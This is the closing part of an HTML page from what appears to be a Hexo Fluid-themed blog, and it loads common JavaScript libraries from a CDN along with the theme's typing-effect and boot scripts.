  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
